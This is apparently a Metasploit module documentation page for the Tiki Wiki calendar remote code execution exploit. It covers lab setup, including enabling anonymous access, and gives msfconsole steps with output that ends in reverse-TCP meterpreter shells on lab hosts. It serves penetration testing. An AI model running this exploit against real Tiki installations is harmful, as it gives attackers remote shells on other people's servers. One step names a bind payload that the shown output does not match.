ContextQMD
Back to Metasploit Framework

Tiki Calendar Exec

documentation/modules/exploit/linux/http/tiki_calendar_exec.md

6.4.1313.2 KB
Original Source

Vulnerable Application

Of note, there is some discussion if 14.2 is vuln or not.

  1. Exploit-DB says in the title (may be wrong) 14.2 is vuln.
  2. The linked app Exploit-DB has is 14.2.
  3. Its verified on Exploit-DB.

vs

  1. Manual print statement testing from the PoC on 14.2 doesn't seem to be vuln
  2. The notice seems to say 14.2 is the update that fixes the problem

Creating A Testing Environment

  1. Create a fresh Ubuntu 16.04 w/ a LAMP install
  2. apt-get install php-xml
  3. Normal php install at that point!
  4. After install, login as admin:admin
  5. Go to the Control Panels
  6. Click Features
  7. Enable Calendar under Main feature
  8. Click Apply

Permissions

If you wish to enable the non-logged in user (anonymous) to view/exploit the calendar:

  1. Log in as admin
  2. From the top dropdown select permissions
  3. Check Anonymous near the top
  4. Click Assign

Verification Steps

  1. Install the software as documented above
  2. Start msfconsole
  3. Do: use exploit/linux/http/tiki_calendar_exec
  4. Do: set rhost 10.10.10.10
  5. (optional, if not set, set username to empty) Do: set PASSWORD admin
  6. Do: set payload php/bind_perl
  7. Do: set verbose true
  8. Do: check
  [*] Attempting Login
  [+] Login Successful!
  [+] 10.10.10.10:80 The target is vulnerable.
  1. Do: exploit
  2. You should get a shell
  [*] Started reverse TCP handler on 10.10.10.10:4444 
  [*] Attempting Login
  [+] Login Successful!
  [*] Sending malicious calendar view packet
  [*] Sending stage (33721 bytes) 10.10.10.10.190
  [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400

Options

PASSWORD

Password is set at first login. Default for admin is 'admin'.

Scenarios

Example running against unauthenticated calendar v14.1

  msf > use exploit/linux/http/tiki_calendar_exec
  msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
  rhost => 192.168.2.190
  msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
  targeturi => /t14_1/
  msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
  payload => php/meterpreter/reverse_tcp
  msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
  lhost => 192.168.2.229
  msf exploit(tiki_calendar_exec) > set verbose true
  verbose => true
  msf exploit(tiki_calendar_exec) > set username ''
  username => 
  msf exploit(tiki_calendar_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending malicious calendar view packet
  [*] Sending stage (33721 bytes) to 192.168.2.190
  [*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400
  
  meterpreter > sysinfo
  Computer    : tikiwiki
  OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
  Meterpreter : php/php
  meterpreter >